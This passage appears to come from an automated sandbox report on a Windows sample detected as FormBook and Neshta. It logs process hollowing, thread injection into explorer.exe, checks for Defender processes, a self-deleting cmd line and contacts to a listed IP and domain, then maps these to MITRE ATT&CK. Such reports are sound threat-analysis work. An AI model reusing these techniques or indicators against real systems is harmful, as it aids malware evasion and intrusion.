          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.agileintelligence.coach
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeSection loaded: unknown target: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeThread register set: target process: 3440
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeThread register set: target process: 3440
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: E0000
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 10A0000
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeProcess created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: vi0EwpbUht.exe, 00000001.00000002.584593645.0000000000DB0000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.442375787.00000000083E9000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: vi0EwpbUht.exe, 00000001.00000002.584593645.0000000000DB0000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.336952872.00000000008B8000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: vi0EwpbUht.exe, 00000001.00000002.584593645.0000000000DB0000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.372075782.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: vi0EwpbUht.exe, 00000001.00000002.584593645.0000000000DB0000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.372075782.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: GetLocaleInfoA,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: GetLocaleInfoA,
          Source: C:\Windows\svchost.comCode function: GetLocaleInfoA,
          Source: C:\Windows\svchost.comCode function: GetLocaleInfoA,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F270 GetLocalTime,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040D815 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,
          Source: vi0EwpbUht.exe, 00000001.00000003.441467911.00000000022C4000.00000004.00000001.sdmpBinary or memory string: MSASCui.exe
          Source: vi0EwpbUht.exe, 00000001.00000003.441467911.00000000022C4000.00000004.00000001.sdmpBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPE
          Yara detected NeshtaShow sources
          Source: Yara matchFile source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vi0EwpbUht.exe PID: 7096, type: MEMORY
          Source: Yara matchFile source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Windows Service1Windows Service1Deobfuscate/Decode Files or Information1Credential API Hooking1System Time Discovery1Taint Shared Content1Archive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Registry Run Keys / Startup Folder11Process Injection512Obfuscated Files or Information2Input Capture11System Network Connections Discovery1Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder11Software Packing11Security Account ManagerFile and Directory Discovery4SMB/Windows Admin SharesInput Capture11Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Rootkit1NTDSSystem Information Discovery114Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading321LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion31Cached Domain CredentialsSecurity Software Discovery241VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection512DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemVirtualization/Sandbox Evasion31Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
